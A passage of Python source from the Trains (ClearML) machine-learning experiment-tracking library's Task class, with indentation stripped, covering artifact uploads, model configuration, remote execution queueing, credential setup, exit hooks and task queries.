Get a dictionary containing the Task's registered (dynamically synchronized) artifacts (name, artifact object).
.. note::
After calling ``get_registered_artifacts``, you can still modify the registered artifacts.
:return: The registered (dynamically synchronized) artifacts.
"""
return self._artifacts_manager.registered_artifacts
def upload_artifact(
self,
name, # type: str
artifact_object, # type: Union[str, Mapping, pandas.DataFrame, numpy.ndarray, Image.Image]
metadata=None, # type: Optional[Mapping]
delete_after_upload=False # type: bool
):
# type: (...) -> bool
"""
Upload (add) a static artifact to a Task object. The artifact is uploaded in the background.
The currently supported upload (static) artifact types include:
- string / pathlib2.Path - A path to artifact file. If a wildcard or a folder is specified, then Trains
creates and uploads a ZIP file.
- dict - Trains stores a dictionary as ``.json`` file and uploads it.
- pandas.DataFrame - Trains stores a pandas.DataFrame as ``.csv.gz`` (compressed CSV) file and uploads it.
- numpy.ndarray - Trains stores a numpy.ndarray as ``.npz`` file and uploads it.
- PIL.Image - Trains stores a PIL.Image as ``.png`` file and uploads it.
:param str name: The artifact name.
.. warning::
If an artifact with the same name was previously uploaded, then it is overwritten.
:param object artifact_object: The artifact object.
:param dict metadata: A dictionary of key-value pairs for any metadata. This dictionary appears with the
experiment in the **Trains Web-App (UI)**, **ARTIFACTS** tab.
:param bool delete_after_upload: After the upload, delete the local copy of the artifact?
- ``True`` - Delete the local copy of the artifact.
- ``False`` - Do not delete. (default)
:return: The status of the upload.
- ``True`` - Upload succeeded.
- ``False`` - Upload failed.
:raise: If the artifact object type is not supported, raise a ``ValueError``.
"""
return self._artifacts_manager.upload_artifact(name=name, artifact_object=artifact_object,
metadata=metadata, delete_after_upload=delete_after_upload)
def get_models(self):
# type: () -> Dict[str, Sequence[Model]]
"""
Return a dictionary with {'input': [], 'output': []} loaded/stored models of the current Task
Input models are files loaded in the task, either manually or automatically logged
Output models are files stored in the task, either manually or automatically logged
Automatically logged frameworks are for example: TensorFlow, Keras, PyTorch, ScikitLearn(joblib) etc.
:return: A dictionary with keys input/output, each is list of Model objects.
Example:
.. code-block:: py
{'input': [trains.Model()], 'output': [trains.Model()]}
"""
task_models = {'input': self._get_models(model_type='input'),
'output': self._get_models(model_type='output')}
return task_models
def is_current_task(self):
# type: () -> bool
"""
.. deprecated:: 0.13.0
This method is deprecated. Use :meth:`Task.is_main_task` instead.
Is this Task object the main execution Task (initially returned by :meth:`Task.init`)?
:return: Is this Task object the main execution Task?
- ``True`` - Is the main execution Task.
- ``False`` - Is not the main execution Task.
"""
return self.is_main_task()
def is_main_task(self):
# type: () -> bool
"""
Is this Task object the main execution Task (initially returned by :meth:`Task.init`)?
.. note::
If :meth:`Task.init` was never called, this method will *not* create
it, making this test more efficient than:
.. code-block:: py
Task.init() == task
:return: Is this Task object the main execution Task?
- ``True`` - Is the main execution Task.
- ``False`` - Is not the main execution Task.
"""
return self is self.__main_task
def set_model_config(self, config_text=None, config_dict=None):
# type: (Optional[str], Optional[Mapping]) -> None
"""
.. deprecated:: 0.14.1
Use :meth:`Task.connect_configuration` instead.
"""
self._set_model_config(config_text=config_text, config_dict=config_dict)
def get_model_config_text(self):
# type: () -> str
"""
.. deprecated:: 0.14.1
Use :meth:`Task.connect_configuration` instead.
"""
return self._get_model_config_text()
def get_model_config_dict(self):
# type: () -> Dict
"""
.. deprecated:: 0.14.1
Use :meth:`Task.connect_configuration` instead.
"""
return self._get_model_config_dict()
def set_model_label_enumeration(self, enumeration=None):
# type: (Optional[Mapping[str, int]]) -> ()
"""
Set the label enumeration for the Task object before creating an output model.
Later, when creating an output model, the model will inherit these properties.
:param dict enumeration: A label enumeration dictionary of string (label) to integer (value) pairs.
For example:
.. code-block:: javascript
{
'background': 0,
'person': 1
}
"""
super(Task, self).set_model_label_enumeration(enumeration=enumeration)
def get_last_iteration(self):
# type: () -> int
"""
Get the last reported iteration, which is the last iteration for which the Task reported a metric.
.. note::
The maximum reported iteration is not in the local cache. This method
sends a request to the **Trains Server** (backend).
:return: The last reported iteration number.
"""
self._reload_last_iteration()
return max(self.data.last_iteration, self._reporter.max_iteration if self._reporter else 0)
def set_last_iteration(self, last_iteration):
# type: (int) -> None
"""
Forcefully set the last reported iteration, which is the last iteration for which the Task reported a metric.
:param int last_iteration: The last reported iteration number.
"""
self.data.last_iteration = int(last_iteration)
self._edit(last_iteration=self.data.last_iteration)
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set initial iteration, instead of zero. Useful when continuing training from previous checkpoints
:param int offset: Initial iteration (at starting point)
:return: Newly set initial offset.
"""
return super(Task, self).set_initial_iteration(offset=offset)
def get_initial_iteration(self):
# type: () -> int
"""
Return the initial iteration offset, default is 0
Useful when continuing training from previous checkpoints
:return: Initial iteration offset.
"""
return super(Task, self).get_initial_iteration()
def get_last_scalar_metrics(self):
# type: () -> Dict[str, Dict[str, Dict[str, float]]]
"""
Get the last scalar metrics which the Task reported. This is a nested dictionary, ordered by title and series.
For example:
.. code-block:: javascript
{
'title': {
'series': {
'last': 0.5,
'min': 0.1,
'max': 0.9
}
}
}
:return: The last scalar metrics.
"""
self.reload()
metrics = self.data.last_metrics
scalar_metrics = dict()
for i in metrics.values():
for j in i.values():
scalar_metrics.setdefault(j['metric'], {}).setdefault(
j['variant'], {'last': j['value'], 'min': j['min_value'], 'max': j['max_value']})
return scalar_metrics
def get_parameters_as_dict(self):
# type: () -> Dict
"""
Get the Task parameters as a raw nested dictionary.
.. note::
The values are not parsed. They are returned as is.
"""
return naive_nested_from_flat_dictionary(self.get_parameters())
def set_parameters_as_dict(self, dictionary):
# type: (Dict) -> None
"""
Set the parameters for the Task object from a dictionary. The dictionary can be nested.
This does not link the dictionary to the Task object. It does a one-time update. This
is the same behavior as the :meth:`Task.connect` method.
"""
self._arguments.copy_from_dict(flatten_dictionary(dictionary))
def execute_remotely(self, queue_name=None, clone=False, exit_process=True):
# type: (Optional[str], bool, bool) -> ()
"""
If task is running locally (i.e., not by ``trains-agent``), then clone the Task and enqueue it for remote
execution; or, stop the execution of the current Task, reset its state, and enqueue it. If ``exit==True``,
*exit* this process.
.. note::
If the task is running remotely (i.e., ``trains-agent`` is executing it), this call is a no-op
(i.e., does nothing).
:param queue_name: The queue name used for enqueueing the task. If ``None``, this call exits the process
without enqueuing the task.
:param clone: Clone the Task and execute the newly cloned Task?
The values are:
- ``True`` - A cloned copy of the Task will be created, and enqueued, instead of this Task.
- ``False`` - The Task will be enqueued.
:param exit_process: The function call will leave the calling process at the end?
- ``True`` - Exit the process (exit(0)).
- ``False`` - Do not exit the process.
.. warning::
If ``clone==False``, then ``exit_process`` must be ``True``.
"""
# do nothing, we are running remotely
if running_remotely():
return
if not clone and not exit_process:
raise ValueError(
"clone==False and exit_process==False is not supported. "
"Task enqueuing itself must exit the process afterwards.")
# make sure we analyze the process
if self.status in (Task.TaskStatusEnum.in_progress, ):
if clone:
# wait for repository detection (5 minutes should be reasonable time to detect all packages)
self.flush(wait_for_uploads=True)
if self._logger and not self.__is_subprocess():
self._wait_for_repo_detection(timeout=300.)
else:
# close ourselves (it will make sure the repo is updated)
self.close()
# clone / reset Task
if clone:
task = Task.clone(self)
else:
task = self
self.reset()
# enqueue ourselves
if queue_name:
Task.enqueue(task, queue_name=queue_name)
LoggerRoot.get_base_logger().warning(
'Switching to remote execution, output log page {}'.format(task.get_output_log_web_page()))
# leave this process.
if exit_process:
LoggerRoot.get_base_logger().warning('Terminating local execution process')
exit(0)
return
def wait_for_status(
self,
status=(_Task.TaskStatusEnum.completed, _Task.TaskStatusEnum.stopped, _Task.TaskStatusEnum.closed),
raise_on_status=(tasks.TaskStatusEnum.failed,),
check_interval_sec=60.,
):
# type: (Iterable[Task.TaskStatusEnum], Optional[Iterable[Task.TaskStatusEnum]], float) -> ()
"""
Wait for a task to reach a defined status.
:param status: Status to wait for. Defaults to ('completed', 'stopped', 'closed', )
:param raise_on_status: Raise RuntimeError if the status of the tasks matches one of these values.
Defaults to ('failed').
:param check_interval_sec: Interval in seconds between two checks. Defaults to 60 seconds.
:raise: RuntimeError if the status is one of {raise_on_status}.
"""
stopped_status = list(status) + (list(raise_on_status) if raise_on_status else [])
while self.status not in stopped_status:
time.sleep(check_interval_sec)
if raise_on_status and self.status in raise_on_status:
raise RuntimeError("Task {} has status: {}.".format(self.task_id, self.status))
@classmethod
def set_credentials(cls, api_host=None, web_host=None, files_host=None, key=None, secret=None, host=None):
# type: (Optional[str], Optional[str], Optional[str], Optional[str], Optional[str], Optional[str]) -> ()
"""
Set new default **Trains Server** (backend) host and credentials.
These credentials will be overridden by either OS environment variables, or the Trains configuration
file, ``trains.conf``.
.. warning::
Credentials must be set before initializing a Task object.
For example, to set credentials for a remote computer:
.. code-block:: py
Task.set_credentials(api_host='http://localhost:8008', web_host='http://localhost:8080',
files_host='http://localhost:8081', key='optional_credentials', secret='optional_credentials')
task = Task.init('project name', 'experiment name')
:param str api_host: The API server url. For example, ``host='http://localhost:8008'``
:param str web_host: The Web server url. For example, ``host='http://localhost:8080'``
:param str files_host: The file server url. For example, ``host='http://localhost:8081'``
:param str key: The user key (in the key/secret pair). For example, ``key='thisisakey123'``
:param str secret: The user secret (in the key/secret pair). For example, ``secret='thisisseceret123'``
:param str host: The host URL (overrides api_host). For example, ``host='http://localhost:8008'``
"""
if api_host:
Session.default_host = api_host
if web_host:
Session.default_web = web_host
if files_host:
Session.default_files = files_host
if key:
Session.default_key = key
if not running_remotely():
ENV_ACCESS_KEY.set(key)
if secret:
Session.default_secret = secret
if not running_remotely():
ENV_SECRET_KEY.set(secret)
if host:
Session.default_host = host
Session.default_web = web_host or ''
Session.default_files = files_host or ''
def _set_model_config(self, config_text=None, config_dict=None):
# type: (Optional[str], Optional[Mapping]) -> None
"""
Set Task model configuration text/dict
:param config_text: model configuration (unconstrained text string). usually the content
of a configuration file. If `config_text` is not None, `config_dict` must not be provided.
:param config_dict: model configuration parameters dictionary.
If `config_dict` is not None, `config_text` must not be provided.
"""
# noinspection PyProtectedMember
design = OutputModel._resolve_config(config_text=config_text, config_dict=config_dict)
super(Task, self)._set_model_design(design=design)
def _get_model_config_text(self):
# type: () -> str
"""
Get Task model configuration text (before creating an output model)
When an output model is created it will inherit these properties
:return: The model config_text (unconstrained text string).
"""
return super(Task, self).get_model_design()
def _get_model_config_dict(self):
# type: () -> Dict
"""
Get Task model configuration dictionary (before creating an output model)
When an output model is created it will inherit these properties
:return: config_dict: model configuration parameters dictionary.
"""
config_text = self._get_model_config_text()
# noinspection PyProtectedMember
return OutputModel._text_to_config_dict(config_text)
@classmethod
def _reset_current_task_obj(cls):
if not cls.__main_task:
return
task = cls.__main_task
cls.__main_task = None
if task._dev_worker:
task._dev_worker.unregister()
task._dev_worker = None
@classmethod
def _create_dev_task(
cls, default_project_name, default_task_name, default_task_type, reuse_last_task_id, detect_repo=True
):
if not default_project_name or not default_task_name:
# get project name and task name from repository name and entry_point
result, _ = ScriptInfo.get(create_requirements=False, check_uncommitted=False)
if not default_project_name:
# noinspection PyBroadException
try:
parts = result.script['repository'].split('/')
default_project_name = (parts[-1] or parts[-2]).replace('.git', '') or 'Untitled'
except Exception:
default_project_name = 'Untitled'
if not default_task_name:
# noinspection PyBroadException
try:
default_task_name = os.path.splitext(os.path.basename(result.script['entry_point']))[0]
except Exception:
pass
# if we force no task reuse from os environment
if DEV_TASK_NO_REUSE.get() or not reuse_last_task_id:
default_task = None
else:
# if we have a previous session to use, get the task id from it
default_task = cls.__get_last_used_task_id(
default_project_name,
default_task_name,
default_task_type.value,
)
closed_old_task = False
default_task_id = None
task = None
in_dev_mode = not running_remotely()
if in_dev_mode:
if isinstance(reuse_last_task_id, str) and reuse_last_task_id:
default_task_id = reuse_last_task_id
elif not reuse_last_task_id or not cls.__task_is_relevant(default_task):
default_task_id = None
else:
default_task_id = default_task.get('id') if default_task else None
if default_task_id:
try:
task = cls(
private=cls.__create_protection,
task_id=default_task_id,
log_to_backend=True,
)
task_tags = task.data.system_tags if hasattr(task.data, 'system_tags') else task.data.tags
task_artifacts = task.data.execution.artifacts \
if hasattr(task.data.execution, 'artifacts') else None
if ((str(task._status) in (str(tasks.TaskStatusEnum.published), str(tasks.TaskStatusEnum.closed)))
or task.output_model_id or (ARCHIVED_TAG in task_tags)
or (cls._development_tag not in task_tags)
or task_artifacts):
# If the task is published or closed, we shouldn't reset it so we can't use it in dev mode
# If the task is archived, or already has an output model,
# we shouldn't use it in development mode either
default_task_id = None
task = None
else:
with task._edit_lock:
# from now on, there is no need to reload, we just clear stuff,
# this flag will be cleared off once we actually refresh at the end of the function
task._reload_skip_flag = True
# reset the task, so we can update it
task.reset(set_started_on_success=False, force=False)
# clear the heaviest stuff first
task._clear_task(
system_tags=[cls._development_tag],
comment=make_message('Auto-generated at %(time)s by %(user)s@%(host)s'))
except (Exception, ValueError):
# we failed reusing task, create a new one
default_task_id = None
# create a new task
if not default_task_id:
task = cls(
private=cls.__create_protection,
project_name=default_project_name,
task_name=default_task_name,
task_type=default_task_type,
log_to_backend=True,
)
# no need to reload yet, we clear this before the end of the function
task._reload_skip_flag = True
if in_dev_mode:
# update this session, for later use
cls.__update_last_used_task_id(default_project_name, default_task_name, default_task_type.value, task.id)
# set default docker image from env.
task._set_default_docker_image()
# mark the task as started
task.started()
# reload, making sure we are synced
task._reload_skip_flag = False
task.reload()
# force update of base logger to this current task (this is the main logger task)
task._setup_log(replace_existing=True)
logger = task.get_logger()
if closed_old_task:
logger.report_text('TRAINS Task: Closing old development task id={}'.format(default_task.get('id')))
# print warning, reusing/creating a task
if default_task_id:
logger.report_text('TRAINS Task: overwriting (reusing) task id=%s' % task.id)
else:
logger.report_text('TRAINS Task: created new task id=%s' % task.id)
# update current repository and put warning into logs
if detect_repo:
# noinspection PyBroadException
try:
import traceback
stack = traceback.extract_stack(limit=10)
# NOTICE WE ARE ALWAYS 3 down from caller in stack!
for i in range(len(stack)-1, 0, -1):
# look for the Task.init call, then the one above it is the callee module
if stack[i].name == 'init':
task._calling_filename = os.path.abspath(stack[i-1].filename)
break
except Exception:
pass
if in_dev_mode and cls.__detect_repo_async:
task._detect_repo_async_thread = threading.Thread(target=task._update_repository)
task._detect_repo_async_thread.daemon = True
task._detect_repo_async_thread.start()
else:
task._update_repository()
# make sure we see something in the UI
thread = threading.Thread(target=LoggerRoot.flush)
thread.daemon = True
thread.start()
return task
def _get_logger(self, flush_period=NotSet):
# type: (Optional[float]) -> Logger
"""
get a logger object for reporting based on the task
:param flush_period: The period of the logger flush.
If None of any other False value, will not flush periodically.
If a logger was created before, this will be the new period and
the old one will be discarded.
:return: Logger object
"""
if not self._logger:
# do not recreate logger after task was closed/quit
if self._at_exit_called:
raise ValueError("Cannot use Task Logger after task was closed")
# force update of base logger to this current task (this is the main logger task)
self._setup_log(replace_existing=self.is_main_task())
# Get a logger object
self._logger = Logger(private_task=self)
# make sure we set our reported to async mode
# we make sure we flush it in self._at_exit
self.reporter.async_enable = True
# if we just created the logger, set default flush period
if not flush_period or flush_period is self.NotSet:
flush_period = DevWorker.report_period
if isinstance(flush_period, (int, float)):
flush_period = int(abs(flush_period))
if flush_period is None or isinstance(flush_period, int):
self._logger.set_flush_period(flush_period)
return self._logger
def _connect_output_model(self, model):
assert isinstance(model, OutputModel)
model.connect(self)
return model
def _save_output_model(self, model):
"""
Save a reference to the connected output model.
:param model: The connected output model
"""
self._connected_output_model = model
def _reconnect_output_model(self):
"""
If there is a saved connected output model, connect it again.
This is needed if the input model is connected after the output model
is connected, an then we will have to get the model design from the
input model by reconnecting.
"""
if self._connected_output_model:
self.connect(self._connected_output_model)
def _connect_input_model(self, model):
assert isinstance(model, InputModel)
# we only allow for an input model to be connected once
# at least until we support multiple input models
# notice that we do not check the task's input model because we allow task reuse and overwrite
# add into comment that we are using this model
comment = self.comment or ''
if not comment.endswith('\n'):
comment += '\n'
comment += 'Using model id: {}'.format(model.id)
self.set_comment(comment)
if self._last_input_model_id and self._last_input_model_id != model.id:
self.log.info('Task connect, second input model is not supported, adding into comment section')
return
self._last_input_model_id = model.id
model.connect(self)
return model
def _try_set_connected_parameter_type(self, option):
# """ Raise an error if current value is not None and not equal to the provided option value """
# value = self._connected_parameter_type
# if not value or value == option:
# self._connected_parameter_type = option
# return option
#
# def title(option):
# return " ".join(map(str.capitalize, option.split("_")))
#
# raise ValueError(
# "Task already connected to {}. "
# "Task can be connected to only one the following argument options: {}".format(
# title(value),
# ' / '.join(map(title, self._ConnectedParametersType._options())))
# )
# added support for multiple type connections through _Arguments
return option
def _connect_argparse(self, parser, args=None, namespace=None, parsed_args=None):
# do not allow argparser to connect to jupyter notebook
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
# noinspection PyPackageRequirements
from IPython import get_ipython
ip = get_ipython()
if ip is not None and 'IPKernelApp' in ip.config:
return parser
except Exception:
pass
self._try_set_connected_parameter_type(self._ConnectedParametersType.argparse)
if self.is_main_task():
argparser_update_currenttask(self)
if (parser is None or parsed_args is None) and argparser_parseargs_called():
_parser, _parsed_args = get_argparser_last_args()
if parser is None:
parser = _parser
if parsed_args is None and parser == _parser:
parsed_args = _parsed_args
if running_remotely() and self.is_main_task():
self._arguments.copy_to_parser(parser, parsed_args)
else:
self._arguments.copy_defaults_from_argparse(
parser, args=args, namespace=namespace, parsed_args=parsed_args)
return parser
def _connect_dictionary(self, dictionary):
def _update_args_dict(task, config_dict):
# noinspection PyProtectedMember
task._arguments.copy_from_dict(flatten_dictionary(config_dict))
def _refresh_args_dict(task, config_dict):
# reread from task including newly added keys
# noinspection PyProtectedMember
a_flat_dict = task._arguments.copy_to_dict(flatten_dictionary(config_dict))
# noinspection PyProtectedMember
nested_dict = config_dict._to_dict()
config_dict.clear()
config_dict.update(nested_from_flat_dictionary(nested_dict, a_flat_dict))
self._try_set_connected_parameter_type(self._ConnectedParametersType.dictionary)
if not running_remotely() or not self.is_main_task():
self._arguments.copy_from_dict(flatten_dictionary(dictionary))
dictionary = ProxyDictPostWrite(self, _update_args_dict, **dictionary)
else:
flat_dict = flatten_dictionary(dictionary)
flat_dict = self._arguments.copy_to_dict(flat_dict)
dictionary = nested_from_flat_dictionary(dictionary, flat_dict)
dictionary = ProxyDictPostWrite(self, _refresh_args_dict, **dictionary)
return dictionary
def _connect_task_parameters(self, attr_class):
self._try_set_connected_parameter_type(self._ConnectedParametersType.task_parameters)
if running_remotely() and self.is_main_task():
attr_class.update_from_dict(self.get_parameters())
else:
self.set_parameters(attr_class.to_dict())
return attr_class
def _validate(self, check_output_dest_credentials=False):
if running_remotely():
super(Task, self)._validate(check_output_dest_credentials=False)
def _output_model_updated(self):
""" Called when a connected output model is updated """
if running_remotely() or not self.is_main_task():
return
# Make sure we know we've started, just in case we didn't so far
self._dev_mode_task_start(model_updated=True)
def _dev_mode_task_start(self, model_updated=False):
""" Called when we suspect the task has started running """
self._dev_mode_setup_worker(model_updated=model_updated)
def _dev_mode_stop_task(self, stop_reason):
# make sure we do not get called (by a daemon thread) after at_exit
if self._at_exit_called:
return
self.log.warning(
"### TASK STOPPED - USER ABORTED - {} ###".format(
stop_reason.upper().replace('_', ' ')
)
)
self.flush(wait_for_uploads=True)
self.stopped()
if self._dev_worker:
self._dev_worker.unregister()
# NOTICE! This will end the entire execution tree!
if self.__exit_hook:
self.__exit_hook.remote_user_aborted = True
self._kill_all_child_processes(send_kill=False)
time.sleep(2.0)
self._kill_all_child_processes(send_kill=True)
# noinspection PyProtectedMember
os._exit(1)
@staticmethod
def _kill_all_child_processes(send_kill=False):
# get current process if pid not provided
pid = os.getpid()
try:
parent = psutil.Process(pid)
except psutil.Error:
# could not find parent process id
return
for child in parent.children(recursive=True):
if send_kill:
child.kill()
else:
child.terminate()
# kill ourselves
if send_kill:
parent.kill()
else:
parent.terminate()
def _dev_mode_setup_worker(self, model_updated=False):
if running_remotely() or not self.is_main_task() or self._at_exit_called:
return
if self._dev_worker:
return self._dev_worker
self._dev_worker = DevWorker()
self._dev_worker.register(self)
logger = self.get_logger()
flush_period = logger.get_flush_period()
if not flush_period or flush_period > self._dev_worker.report_period:
logger.set_flush_period(self._dev_worker.report_period)
def _wait_for_repo_detection(self, timeout=None):
# wait for detection repo sync
if not self._detect_repo_async_thread:
return
with self._repo_detect_lock:
if not self._detect_repo_async_thread:
return
# noinspection PyBroadException
try:
if self._detect_repo_async_thread.is_alive():
# if negative timeout, just kill the thread:
if timeout is not None and timeout < 0:
from .utilities.lowlevel.threads import kill_thread
kill_thread(self._detect_repo_async_thread)
else:
self.log.info('Waiting for repository detection and full package requirement analysis')
self._detect_repo_async_thread.join(timeout=timeout)
# because join has no return value
if self._detect_repo_async_thread.is_alive():
self.log.info('Repository and package analysis timed out ({} sec), '
'giving up'.format(timeout))
# done waiting, kill the thread
from .utilities.lowlevel.threads import kill_thread
kill_thread(self._detect_repo_async_thread)
else:
self.log.info('Finished repository detection and package analysis')
self._detect_repo_async_thread = None
except Exception:
pass
def _summary_artifacts(self):
# signal artifacts upload, and stop daemon
self._artifacts_manager.stop(wait=True)
# print artifacts summary (if not empty)
if self._artifacts_manager.summary:
self.get_logger().report_text(self._artifacts_manager.summary)
def _at_exit(self):
# protect sub-process at_exit (should never happen)
if self._at_exit_called:
return
# shutdown will clear the main, so we have to store it before.
# is_main = self.is_main_task()
self.__shutdown()
# In rare cases we might need to forcefully shutdown the process, currently we should avoid it.
# if is_main:
# # we have to forcefully shutdown if we have forked processes, sometimes they will get stuck
# os._exit(self.__exit_hook.exit_code if self.__exit_hook and self.__exit_hook.exit_code else 0)
def __shutdown(self):
"""
Will happen automatically once we exit code, i.e. atexit
:return:
"""
# protect sub-process at_exit
if self._at_exit_called:
return
is_sub_process = self.__is_subprocess()
# noinspection PyBroadException
try:
# from here do not get into watch dog
self._at_exit_called = True
wait_for_uploads = True
# first thing mark task as stopped, so we will not end up with "running" on lost tasks
# if we are running remotely, the daemon will take care of it
task_status = None
wait_for_std_log = True
if not running_remotely() and self.is_main_task() and not is_sub_process:
# check if we crashed, ot the signal is not interrupt (manual break)
task_status = ('stopped', )
if self.__exit_hook:
is_exception = self.__exit_hook.exception
# check if we are running inside a debugger
if not is_exception and sys.modules.get('pydevd'):
# noinspection PyBroadException
try:
is_exception = sys.last_type
except Exception:
pass
if (is_exception and not isinstance(self.__exit_hook.exception, KeyboardInterrupt)) \
or (not self.__exit_hook.remote_user_aborted and self.__exit_hook.signal not in (None, 2)):
task_status = ('failed', 'Exception')
wait_for_uploads = False
else:
wait_for_uploads = (self.__exit_hook.remote_user_aborted or self.__exit_hook.signal is None)
if not self.__exit_hook.remote_user_aborted and self.__exit_hook.signal is None and \
not is_exception:
task_status = ('completed', )
else:
task_status = ('stopped', )
# user aborted. do not bother flushing the stdout logs
wait_for_std_log = self.__exit_hook.signal is not None
# wait for repository detection (if we didn't crash)
if wait_for_uploads and self._logger:
# we should print summary here
self._summary_artifacts()
# make sure that if we crashed the thread we are not waiting forever
if not is_sub_process:
self._wait_for_repo_detection(timeout=10.)
# kill the repo thread (negative timeout, do not wait), if it hasn't finished yet.
self._wait_for_repo_detection(timeout=-1)
# wait for uploads
print_done_waiting = False
if wait_for_uploads and (BackendModel.get_num_results() > 0 or
(self._reporter and self.reporter.get_num_results() > 0)):
self.log.info('Waiting to finish uploads')
print_done_waiting = True
# from here, do not send log in background thread
if wait_for_uploads:
self.flush(wait_for_uploads=True)
# wait until the reporter flush everything
if self._reporter:
self.reporter.stop()
if self.is_main_task():
# notice: this will close the reporting for all the Tasks in the system
Metrics.close_async_threads()
# notice: this will close the jupyter monitoring
ScriptInfo.close()
if self.is_main_task():
# noinspection PyBroadException
try:
from .storage.helper import StorageHelper
StorageHelper.close_async_threads()
except Exception:
pass
if print_done_waiting:
self.log.info('Finished uploading')
elif self._logger:
# noinspection PyProtectedMember
self._logger._flush_stdout_handler()
# from here, do not check worker status
if self._dev_worker:
self._dev_worker.unregister()
self._dev_worker = None
# stop resource monitoring
if self._resource_monitor:
self._resource_monitor.stop()
self._resource_monitor = None
if not is_sub_process:
# change task status
if not task_status:
pass
elif task_status[0] == 'failed':
self.mark_failed(status_reason=task_status[1])
elif task_status[0] == 'completed':
self.completed()
elif task_status[0] == 'stopped':
self.stopped()
if self._logger:
self._logger.set_flush_period(None)
# noinspection PyProtectedMember
self._logger._close_stdout_handler(wait=wait_for_uploads or wait_for_std_log)
# this is so in theory we can close a main task and start a new one
if self.is_main_task():
Task.__main_task = None
except Exception:
# make sure we do not interrupt the exit process
pass
# delete locking object (lock file)
if self._edit_lock:
# noinspection PyBroadException
try:
del self.__edit_lock
except Exception:
pass
self._edit_lock = None
@classmethod
def __register_at_exit(cls, exit_callback, only_remove_signal_and_exception_hooks=False):
class ExitHooks(object):
_orig_exit = None
_orig_exc_handler = None
remote_user_aborted = False
def __init__(self, callback):
self.exit_code = None
self.exception = None
self.signal = None
self._exit_callback = callback
self._org_handlers = {}
self._signal_recursion_protection_flag = False
self._except_recursion_protection_flag = False
def update_callback(self, callback):
if self._exit_callback and not six.PY2:
# noinspection PyBroadException
try:
atexit.unregister(self._exit_callback)
except Exception:
pass
self._exit_callback = callback
if callback:
self.hook()
else:
# un register int hook
if self._orig_exc_handler:
sys.excepthook = self._orig_exc_handler
self._orig_exc_handler = None
for h in self._org_handlers:
# noinspection PyBroadException
try:
signal.signal(h, self._org_handlers[h])
except Exception:
pass
self._org_handlers = {}
def hook(self):
if self._orig_exit is None:
self._orig_exit = sys.exit
sys.exit = self.exit
if self._orig_exc_handler is None:
self._orig_exc_handler = sys.excepthook
sys.excepthook = self.exc_handler
if self._exit_callback:
atexit.register(self._exit_callback)
# TODO: check if sub-process hooks are safe enough, for the time being allow it
if not self._org_handlers: # ## and not Task._Task__is_subprocess():
if sys.platform == 'win32':
catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
signal.SIGILL, signal.SIGFPE]
else:
catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
signal.SIGILL, signal.SIGFPE, signal.SIGQUIT]
for c in catch_signals:
# noinspection PyBroadException
try:
self._org_handlers[c] = signal.getsignal(c)
signal.signal(c, self.signal_handler)
except Exception:
pass
def exit(self, code=0):
self.exit_code = code
self._orig_exit(code)
def exc_handler(self, exctype, value, traceback, *args, **kwargs):
if self._except_recursion_protection_flag:
# noinspection PyArgumentList
return sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
self._except_recursion_protection_flag = True
self.exception = value
if self._orig_exc_handler:
# noinspection PyArgumentList
ret = self._orig_exc_handler(exctype, value, traceback, *args, **kwargs)
else:
# noinspection PyNoneFunctionAssignment, PyArgumentList
ret = sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
self._except_recursion_protection_flag = False
return ret
def signal_handler(self, sig, frame):
if self._signal_recursion_protection_flag:
# call original
org_handler = self._org_handlers.get(sig)
if isinstance(org_handler, Callable):
org_handler = org_handler(sig, frame)
return org_handler
self._signal_recursion_protection_flag = True
# call exit callback
self.signal = sig
if self._exit_callback:
# noinspection PyBroadException
try:
self._exit_callback()
except Exception:
pass
# call original signal handler
org_handler = self._org_handlers.get(sig)
if isinstance(org_handler, Callable):
# noinspection PyBroadException
try:
org_handler = org_handler(sig, frame)
except Exception:
org_handler = signal.SIG_DFL
# remove stdout logger, just in case
# noinspection PyBroadException
try:
# noinspection PyProtectedMember
Logger._remove_std_logger()
except Exception:
pass
self._signal_recursion_protection_flag = False
# return handler result
return org_handler
# we only remove the signals since this will hang subprocesses
if only_remove_signal_and_exception_hooks:
if not cls.__exit_hook:
return
if cls.__exit_hook._orig_exc_handler:
sys.excepthook = cls.__exit_hook._orig_exc_handler
cls.__exit_hook._orig_exc_handler = None
for s in cls.__exit_hook._org_handlers:
# noinspection PyBroadException
try:
signal.signal(s, cls.__exit_hook._org_handlers[s])
except Exception:
pass
cls.__exit_hook._org_handlers = {}
return
if cls.__exit_hook is None:
# noinspection PyBroadException
try:
cls.__exit_hook = ExitHooks(exit_callback)
cls.__exit_hook.hook()
except Exception:
cls.__exit_hook = None
else:
cls.__exit_hook.update_callback(exit_callback)
@classmethod
def __get_task(cls, task_id=None, project_name=None, task_name=None):
if task_id:
return cls(private=cls.__create_protection, task_id=task_id, log_to_backend=False)
if project_name:
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(
name=exact_match_regex(project_name)
)
)
project = get_single_result(entity='project', query=project_name, results=res.response.projects)
else:
project = None
system_tags = 'system_tags' if hasattr(tasks.Task, 'system_tags') else 'tags'
res = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(
project=[project.id] if project else None,
name=exact_match_regex(task_name) if task_name else None,
only_fields=['id', 'name', 'last_update', system_tags]
)
)
res_tasks = res.response.tasks
# if we have more than one result, first filter 'archived' results:
if len(res_tasks) > 1:
filtered_tasks = [t for t in res_tasks if not getattr(t, system_tags, None) or
'archived' not in getattr(t, system_tags, None)]
if filtered_tasks:
res_tasks = filtered_tasks
task = get_single_result(entity='task', query=task_name, results=res_tasks, raise_on_error=False)
if not task:
return None
return cls(
private=cls.__create_protection,
task_id=task.id,
log_to_backend=False,
)
@classmethod
def __get_tasks(cls, task_ids=None, project_name=None, task_name=None, **kwargs):
if task_ids:
if isinstance(task_ids, six.string_types):
task_ids = [task_ids]
return [cls(private=cls.__create_protection, task_id=task_id, log_to_backend=False)
for task_id in task_ids]
return [cls(private=cls.__create_protection, task_id=task.id, log_to_backend=False)
for task in cls._query_tasks(project_name=project_name, task_name=task_name, **kwargs)]
@classmethod
def _query_tasks(cls, task_ids=None, project_name=None, task_name=None, **kwargs):
if not task_ids:
task_ids = None
elif isinstance(task_ids, six.string_types):
task_ids = [task_ids]
if project_name:
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(
